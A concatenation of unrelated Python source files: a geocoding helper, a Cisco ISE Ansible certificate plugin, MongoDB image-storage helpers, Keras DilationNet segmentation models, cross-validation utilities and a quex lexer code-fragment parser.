.get("street_number"),
"qq_similarity": r.get("result").get("similarity"),
"qq_deviation": r.get("result").get("deviation"),
"qq_reliability": r.get("result").get("reliability"),
"qq_level": r.get("result").get("level"),
"qq_status": r.get("status"),
"qq_message": r.get("message"),
}
except Exception as e:
logger.info("fetchQQGeo for %s error: %s!" % (address, e))
raise e
def fetchAmapLatLng(address):
"""
Use amap api to get latitude and longitude from the Internet.
https://lbs.qq.com/miniProgram/jsSdk/jsSdkGuide/methodGeocoder
"""
logger.info("fetching {} amap geo info".format(address))
if AMAP_GEO_TOKEN is None:
logger.info("error: Must config AMAP_GEO_TOKEN in sachima_config.py")
raise "Must config AMAP_GEO_TOKEN in sachima_config.py"
par = {"address": address, "key": AMAP_GEO_TOKEN}
base = "http://restapi.amap.com/v3/geocode/geo"
r = requests.get(base, par).json()
geocodes = {}
GPS = [None, None]
if r.get("count") != "0":
geocodes = r.get("geocodes")[0]
GPS = geocodes.get("location").split(",")
return {
"amap_lat": GPS[1],
"amap_lng": GPS[0],
"amap_status": r.get("status"),
"amap_info": r.get("info"),
"amap_infocode": r.get("infocode"),
"amap_count": r.get("count"),
"amap_formatted_address": geocodes.get("formatted_address"),
"amap_country": geocodes.get("country"),
"amap_province": geocodes.get("province"),
"amap_citycode": geocodes.get("citycode"),
"amap_city": geocodes.get("city"),
"amap_adcode": geocodes.get("adcode"),
"amap_street": str(geocodes.get("street")),
"amap_number": str(geocodes.get("number")),
"amap_level": geocodes.get("level"),
}
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.action import ActionBase
try:
from ansible_collections.ansible.utils.plugins.module_utils.common.argspec_validate import (
AnsibleArgSpecValidator,
)
except ImportError:
ANSIBLE_UTILS_IS_INSTALLED = False
else:
ANSIBLE_UTILS_IS_INSTALLED = True
from ansible.errors import AnsibleActionFail
from urllib.parse import quote
import time
from ansible_collections.cisco.ise.plugins.module_utils.personas_utils import (
Node,
ISEDeployment,
)
argument_spec = dict(
primary_ip=dict(type="str", required=True),
primary_username=dict(type="str", required=True),
primary_password=dict(type="str", required=True),
name=dict(type="str", required=True),
ip=dict(type="str", required=True),
hostname=dict(type="str", required=True),
username=dict(type="str", required=True),
password=dict(type="str", required=True),
ise_verify=dict(type="bool", default=True),
ise_version=dict(type="str", default="3.0.0"),
ise_wait_on_rate_limit=dict(type="bool", default=True), # TODO: verify what the true default value should be
)
required_if = []
required_one_of = []
mutually_exclusive = []
required_together = []
class ActionModule(ActionBase):
def __init__(self, *args, **kwargs):
if not ANSIBLE_UTILS_IS_INSTALLED:
raise AnsibleActionFail("ansible.utils is not installed. Execute 'ansible-galaxy collection install ansible.utils'")
super(ActionModule, self).__init__(*args, **kwargs)
self._supports_async = False
self._result = None
# Checks the supplied parameters against the argument spec for this module
def _check_argspec(self):
aav = AnsibleArgSpecValidator(
data=self._task.args,
schema=dict(argument_spec=argument_spec),
schema_format="argspec",
schema_conditionals=dict(
required_if=required_if,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive,
required_together=required_together,
),
name=self._task.action,
)
valid, errors, self._task.args = aav.validate()
if not valid:
raise AnsibleActionFail(errors)
def run(self, tmp=None, task_vars=None):
self._task.diff = False
self._result = super(ActionModule, self).run(tmp, task_vars)
self._result["changed"] = False
self._check_argspec()
primary_node = dict(ip=self._task.args.get("primary_ip"),
username=self._task.args.get("primary_username"),
password=self._task.args.get("primary_password"),
)
other_node = dict(name=self._task.args.get("name"),
ip=self._task.args.get("ip"),
hostname=self._task.args.get("hostname"),
username=self._task.args.get("username"),
password=self._task.args.get("password"),
)
ise_deployment = ISEDeployment()
ise_deployment.add_primary(primary_node)
ise_deployment.add_node(other_node)
ise_deployment.export_import_default_self_signed_server_cert()
response = "The certificate for {name} was exported successfully to the primary node".format(name=self._task.args.get("name"))
self._result.update(dict(ise_response=response))
return self._result
|
# Copyright 2019:
# Marcelo Lerendegui <marcelo@lerendegui.com>
# WeiHsien Lee <weihsien.lee@duke.edu>
# Yihang Xin <yihang.xin@duke.edu>
# This file is part of BME547_Final_Project.
#
# BME547_Final_Project is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or any later version.
#
# BME547_Final_Project is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BME547_Final_Project.
# If not, see <https://www.gnu.org/licenses/>.
from pymodm import connect, MongoModel, fields
import os
from server.database_model import Image
from bson import ObjectId
def init():
""" connect to online database
connect to online database
"""
mdb_user = os.environ.get('MONGODB_USER')
mdb_pass = os.environ.get('MONGODB_PASS')
connection_str = "".join([
"mongodb+srv://",
mdb_user,
":",
mdb_pass,
"@bme547-q262c.mongodb.net/Database"
])
connect(connection_str)
def add_image(
filename: str = None,
img_format: str = None,
description: str = None,
size: str = None,
timestamp=None,
data: str = None,
user_hash: str = None
) -> bool:
"""add image to database
add image to database
:param u: image to add
:type u: Image
:return: True on success, False otherwise
:rtype: bool
"""
image_to_add = Image(
filename=filename,
img_format=img_format,
description=description,
size=size,
timestamp=timestamp,
data=data,
user_hash=user_hash,
)
try:
image_to_add.save()
except:
return False
return True
def image_exists(image_id: str, user_hash: str) -> bool:
"""check if image already exists
check if image already exists
:param pid: image id to check
:type pid: str
:return: True if image exists, False otherwise
:rtype: bool
"""
image = get_image(image_id, user_hash)
return image is not None
def get_image(image_id: str, user_hash: str) -> Image:
"""fetch image by image id
fetch image by image id
:param pid: image id to fetch
:type pid: str
:return: image on success, None otherwise
:rtype: Image
"""
try:
image = Image.objects.raw({'_id': ObjectId(image_id)}).first()
if image.user_hash != user_hash:
image = None
except:
image = None
return image
def get_all_user_images(user_hash: str):
"""fetch all images for input user
TODO: Check if return type is a list or not
:param user_hash: hash of a user
:type user_hash: str
:return: list of images
:rtype: list
"""
try:
image = Image.objects.raw({'user_hash': user_hash})
except:
image = None
return image
|
import warnings
from keras import backend as K
from keras.models import Model
from keras.layers import Convolution2D, MaxPooling2D, Input, AtrousConvolution2D
from keras.layers import Dropout, UpSampling2D, ZeroPadding2D
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from datasets import CONFIG
from utils import softmax
# CITYSCAPES MODEL
def get_dilation_model_cityscapes(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(16, 16))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ctx_conv5_1')(h)
h = ZeroPadding2D(padding=(32, 32))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(32, 32), activation='relu', name='ctx_conv6_1')(h)
h = ZeroPadding2D(padding=(64, 64))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(64, 64), activation='relu', name='ctx_conv7_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
h = Convolution2D(classes, 1, 1, name='ctx_final')(h)
# the following two layers pretend to be a Deconvolution with grouping layer.
# never managed to implement it in Keras
# since it's just a gaussian upsampling trainable=False is recommended
h = UpSampling2D(size=(8, 8))(h)
logits = Convolution2D(classes, 16, 16, border_mode='same', bias=False, trainable=False, name='ctx_upsample')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_cityscapes')
return model
# PASCAL VOC MODEL
def get_dilation_model_voc(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, activation='relu', name='fc-final')(h)
h = ZeroPadding2D(padding=(33, 33))(h)
h = Convolution2D(2 * classes, 3, 3, activation='relu', name='ct_conv1_1')(h)
h = Convolution2D(2 * classes, 3, 3, activation='relu', name='ct_conv1_2')(h)
h = AtrousConvolution2D(4 * classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ct_conv2_1')(h)
h = AtrousConvolution2D(8 * classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ct_conv3_1')(h)
h = AtrousConvolution2D(16 * classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ct_conv4_1')(h)
h = AtrousConvolution2D(32 * classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ct_conv5_1')(h)
h = Convolution2D(32 * classes, 3, 3, activation='relu', name='ct_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ct_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_voc12')
return model
# KITTI MODEL
def get_dilation_model_kitti(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ctx_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_kitti')
return model
# CAMVID MODEL
def get_dilation_model_camvid(input_shape, apply_softmax, input_tensor, classes):
if input_tensor is None:
model_in = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
model_in = Input(tensor=input_tensor, shape=input_shape)
else:
model_in = input_tensor
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_1')(model_in)
h = Convolution2D(64, 3, 3, activation='relu', name='conv1_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_1')(h)
h = Convolution2D(128, 3, 3, activation='relu', name='conv2_2')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_1')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_2')(h)
h = Convolution2D(256, 3, 3, activation='relu', name='conv3_3')(h)
h = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='pool3')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_1')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_2')(h)
h = Convolution2D(512, 3, 3, activation='relu', name='conv4_3')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_1')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_2')(h)
h = AtrousConvolution2D(512, 3, 3, atrous_rate=(2, 2), activation='relu', name='conv5_3')(h)
h = AtrousConvolution2D(4096, 7, 7, atrous_rate=(4, 4), activation='relu', name='fc6')(h)
h = Dropout(0.5, name='drop6')(h)
h = Convolution2D(4096, 1, 1, activation='relu', name='fc7')(h)
h = Dropout(0.5, name='drop7')(h)
h = Convolution2D(classes, 1, 1, name='final')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_conv1_2')(h)
h = ZeroPadding2D(padding=(2, 2))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(2, 2), activation='relu', name='ctx_conv2_1')(h)
h = ZeroPadding2D(padding=(4, 4))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(4, 4), activation='relu', name='ctx_conv3_1')(h)
h = ZeroPadding2D(padding=(8, 8))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(8, 8), activation='relu', name='ctx_conv4_1')(h)
h = ZeroPadding2D(padding=(16, 16))(h)
h = AtrousConvolution2D(classes, 3, 3, atrous_rate=(16, 16), activation='relu', name='ctx_conv5_1')(h)
h = ZeroPadding2D(padding=(1, 1))(h)
h = Convolution2D(classes, 3, 3, activation='relu', name='ctx_fc1')(h)
logits = Convolution2D(classes, 1, 1, name='ctx_final')(h)
if apply_softmax:
model_out = softmax(logits)
else:
model_out = logits
model = Model(input=model_in, output=model_out, name='dilation_camvid')
return model
# model function
def DilationNet(dataset, input_shape=None, apply_softmax=True, pretrained=True,
input_tensor=None, classes=None):
""" Instantiate the Dilation network architecture, optionally loading weights
pre-trained on a dataset in the set (cityscapes, voc12, kitti, camvid).
Note that pre-trained model is only available for Theano dim ordering.
The model and the weights should be compatible with both
TensorFlow and Theano backends.
# Arguments
dataset: choose among (cityscapes, voc12, kitti, camvid).
input_shape: shape tuple. It should have exactly 3 inputs channels,
and the axis ordering should be coherent with what specified in
your keras.json (e.g. use (3, 512, 512) for 'th' and (512, 512, 3)
for 'tf'). None will default to dataset specific sizes.
apply_softmax: whether to apply softmax or return logits.
pretrained: boolean. If `True`, loads weights coherently with
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
classes: optional number of segmentation classes. If pretrained is True,
it should be coherent with the dataset chosen.
# Returns
A Keras model instance.
"""
if dataset not in {'cityscapes', 'voc12', 'kitti', 'camvid'}:
raise ValueError('The `dataset` argument should be one among '
'(cityscapes, voc12, kitti, camvid)')
if classes is not None:
if classes != CONFIG[dataset]['classes'] and pretrained:
raise ValueError('Cannot load pretrained model for dataset `{}` '
'with {} classes'.format(dataset, classes))
else:
classes = CONFIG[dataset]['classes']
if input_shape is None:
input_shape = CONFIG[dataset]['input_shape']
# get the model
if dataset == 'cityscapes':
model = get_dilation_model_cityscapes(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'voc12':
model = get_dilation_model_voc(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'kitti':
model = get_dilation_model_kitti(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
elif dataset == 'camvid':
model = get_dilation_model_camvid(input_shape=input_shape, apply_softmax=apply_softmax,
input_tensor=input_tensor, classes=classes)
# load weights
if pretrained:
if K.image_dim_ordering() == 'th':
weights_path = get_file(CONFIG[dataset]['weights_file'],
CONFIG[dataset]['weights_url'],
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
raise NotImplementedError('Pretrained DilationNet model is not available with '
'tensorflow dim ordering')
return model
|
from random import randrange
# Split a dataset into k folds
def cross_validation_split(dataset, n_folds):
dataset_split = list()
dataset_copy = list(dataset)
fold_size = int(len(dataset) / n_folds)
for _ in range(n_folds):
fold = list()
while len(fold) < fold_size:
index = randrange(len(dataset_copy))
fold.append(dataset_copy.pop(index))
dataset_split.append(fold)
return dataset_split
# Calculate accuracy percentage
def accuracy_metric(actual, predicted):
correct = 0
for i in range(len(actual)):
if actual[i] == predicted[i]:
correct = correct + 1
return correct / float(len(actual)) * 100
# Evaluate an algorithm using a cross validation split
def evaluate_algorithm(dataset, algorithm, n_folds, *args):
folds = cross_validation_split(dataset, n_folds)
scores = []
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = sum(train_set, [])
test_set = []
for row in fold:
row_copy = list(row)
test_set.append(row_copy)
row_copy[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
accuracy = accuracy_metric(actual, predicted)
scores.append(accuracy)
return scores
|
"""Unit test for pydrip modules."""
|
from quex.frs_py.file_in import *
import quex.lexer_mode as lexer_mode
from quex.token_id_maker import TokenInfo
from quex.input.setup import setup as Setup
from quex.input.ucs_db_parser import ucs_property_db
from quex.core_engine.utf8 import __read_one_utf8_code_from_stream
from quex.core_engine.generator.action_info import *
LanguageDB = Setup.language_db
def parse(fh, CodeFragmentName,
ErrorOnFailureF=True, AllowBriefTokenSenderF=True):
"""RETURNS: An object of class UserCodeFragment containing
line number, filename, and the code fragment.
None in case of failure.
"""
assert Setup.__class__.__name__ == "something"
assert type(ErrorOnFailureF) == bool
assert type(AllowBriefTokenSenderF) == bool
skip_whitespace(fh)
position = fh.tell()
word = fh.read(2)
if len(word) >= 1 and word[0] == "{":
fh.seek(-1, 1) # unput the second character
return __parse_normal(fh, CodeFragmentName)
elif AllowBriefTokenSenderF and word == "=>":
return __parse_brief_token_sender(fh)
elif not ErrorOnFailureF:
fh.seek(-2,1)
return None
else:
error_msg("missing code fragment after %s definition." % CodeFragmentName, fh)
def __parse_normal(fh, code_fragment_name):
line_n = get_current_line_info_number(fh) + 1
code = read_until_closing_bracket(fh, "{", "}")
return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
def __parse_brief_token_sender(fh):
# shorthand for { self.send(TKN_SOMETHING); RETURN; }
position = fh.tell()
line_n = get_current_line_info_number(fh) + 1
try:
skip_whitespace(fh)
position = fh.tell()
code = __parse_token_id_specification_by_character_code(fh)
if code != "": return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
identifier, arg_list_str = __parse_function_call(fh)
if identifier in ["GOTO", "GOSUB", "GOUP"]:
code = __create_mode_transition_and_token_sender(fh, identifier, arg_list_str)
else:
code = __create_token_sender_by_token_name(fh, identifier, arg_list_str)
if code != "":
return UserCodeFragment(code, fh.name, line_n, LanguageDB, AddReferenceCodeF=True)
else:
return None
except EndOfStreamException:
fh.seek(position)
error_msg("End of file reached while parsing token shortcut.", fh)
def read_character_code(fh):
# NOTE: This function is tested with the regeression test for feature request 2251359.
# See directory $QUEX_PATH/TEST/2251359.
pos = fh.tell()
start = fh.read(1)
if start == "":
seek(pos); return -1
elif start == "'":
# read an utf-8 char an get the token-id
# Example: '+'
character_code = __read_one_utf8_code_from_stream(fh)
if character_code == 0xFF:
error_msg("Missing utf8-character for definition of character code by character.", fh)
elif fh.read(1) != '\'':
error_msg("Missing closing ' for definition of character code by character.", fh)
return character_code
if start == "U":
if fh.read(1) != "C": seek(pos); return -1
# read Unicode Name
# Example: UC MATHEMATICAL_MONOSPACE_DIGIT_FIVE
skip_whitespace(fh)
ucs_name = read_identifier(fh)
if ucs_name == "": seek(pos); return -1
# Get the character set related to the given name. Note, the size of the set
# is supposed to be one.
character_code = ucs_property_db.get_character_set("Name", ucs_name)
if type(character_code) in [str, unicode]:
error_msg("%s does not identify a known unicode character." % ucs_name, fh)
if type(character_code) not in [int, long]:
error_msg("%s relates to more than one character in unicode database." % ucs_name, fh)
return character_code
second = fh.read(1)
if start == "0" and second.isdigit() == False:
base = second
if base not in ["x", "o", "b"]:
error_msg("Number base '0%s' is unknown, please use '0x' for hexidecimal,\n" % base + \
"'0o' for octal, or '0b' for binary.", fh)
number_txt = read_integer(fh)
if number_txt == "":
error_msg("Missing integer number after '0%s'" % base, fh)
try:
if base == "x": character_code = int("0x" + number_txt, 16)
elif base == "o": character_code = int(number_txt, 8)
elif base == "b":
character_code = 0
for letter in number_txt:
character_code = character_code << 1
if letter == "1": character_code += 1
elif letter != "0":
error_msg("Letter '%s' not permitted in binary number (something start with '0b')" % letter, fh)
else:
# A normal integer number (starting with '0' though)
character_code = int(base + number_text)
except:
error_msg("The string '%s' is not appropriate for number base '0%s'." % (number_txt, base), fh)
return character_code
elif start.isdigit():
fh.seek(-2, 1) # undo 'start' and 'second'
# All that remains is that it is a 'normal' integer
number_txt = read_integer(fh)
if number_txt == "": fh.seek(pos); return -1
try: return int(number_txt)
except: error_msg("The string '%s' is not appropriate for number base '10'." % number_txt, fh)
else:
# Try to interpret it as something else ...
fh.seek(pos); return -1
def __parse_function_call(fh):
position = fh.tell()
try:
skip_whitespace(fh)
identifier = read_identifier(fh)
skip_whitespace(fh)
tmp = fh.read(1)
if tmp not in ["(", ";"]:
error_msg("Missing '(' or ';' after '%s'." % identifier, fh)
if tmp == ";":
return identifier, "" # No argument list, ";" arrived immediately
arg_list_str = read_until_closing_bracket(fh, "(", ")")
verify_next_word(fh, ";")
return identifier, arg_list_str
except EndOfStreamException:
fh.seek(position)
error_msg("End of file reached while parsing token shortcut.", fh)
def __parse_token_id_specification_by_character_code(fh):
character_code = read_character_code(fh)
if character_code == -1: return ""
verify_next_word(fh, ";")
prefix_less_token_name = "UCS_0x%06X" % character_code
token_id_str = Setup.input_token_id_prefix + prefix_less_token_name
lexer_mode.token_id_db[prefix_less_token_name] = \
TokenInfo(prefix_less_token_name, character_code, None, fh.name, get_current_line_info_number(fh))
txt = "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += "self.send(%s); return;\n" % token_id_str
txt += "#else\n"
txt += "self.send(%s); return %s;\n" % (token_id_str, token_id_str)
txt += "#endif\n"
return txt
def __create_token_sender_by_token_name(fh, TokenName, ArgListStr):
assert type(ArgListStr) == str
# after 'send' the token queue is filled and one can safely return
if TokenName.find(Setup.input_token_id_prefix) != 0:
error_msg("token identifier does not begin with token prefix '%s'\n" % Setup.input_token_id_prefix + \
"found: '%s'" % TokenName, fh)
# occasionally add token id automatically to database
prefix_less_TokenName = TokenName[len(Setup.input_token_id_prefix):]
if not lexer_mode.token_id_db.has_key(prefix_less_TokenName):
msg = "Token id '%s' defined implicitly." % TokenName
if TokenName in lexer_mode.token_id_db.keys():
msg += "\nNOTE: '%s' has been defined in a token { ... } section!" % \
(Setup.input_token_id_prefix + TokenName)
msg += "\nNote, that tokens in the token { ... } section are automatically prefixed."
error_msg(msg, fh, DontExitF=True)
lexer_mode.token_id_db[prefix_less_TokenName] = \
TokenInfo(prefix_less_TokenName, None, None, fh.name, get_current_line_info_number(fh))
tail = ArgListStr
if tail != "": tail = ", " + tail
txt = "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += "self.send(%s%s); return;\n" % (TokenName, tail)
txt += "#else\n"
txt += "self.send(%s); return %s;\n" % (ArgListStr, TokenName)
txt += "#endif\n"
return txt
def __create_mode_transition_and_token_sender(fh, Command, ArgListStr):
assert Command in ["GOTO", "GOSUB", "GOUP"]
assert type(ArgListStr) == str
arg_list = ArgListStr.split(",")
arg_list = filter(lambda arg: arg != "", arg_list)
L = len(arg_list)
target_mode = None
token_name = None
tail = []
if Command in ["GOTO", "GOSUB"]:
if L < 1:
error_msg("The %s mode short cut requires at least one argument: The target mode." % Command, fh)
target_mode = arg_list[0]
if L > 1: token_name = arg_list[1]
if L > 2: tail = arg_list[2:]
else: # Command == "GOUP"
if L > 0: token_name = arg_list[0]
if L > 1: tail = arg_list[1:]
mode_change_str = { "GOTO": lambda Mode: "self << " + Mode + ";\n",
"GOSUB": lambda Mode: "self.push_mode(" + Mode + ");\n",
"GOUP": lambda Mode: "self.pop_mode();\n"
}[Command](target_mode)
tail_str = ""
for element in tail:
tail_str += ", " + element
if token_name != None: send_str = "self.send(%s%s); "% (token_name, tail_str)
else: send_str = ""
txt = mode_change_str
txt += "#ifdef QUEX_OPTION_TOKEN_SENDING_VIA_QUEUE\n"
txt += send_str + "return;\n"
txt += "#else\n"
txt += send_str + "return %s;\n" % token_name
txt += "#endif\n"
return txt
|
# Mode: -*- python -*-
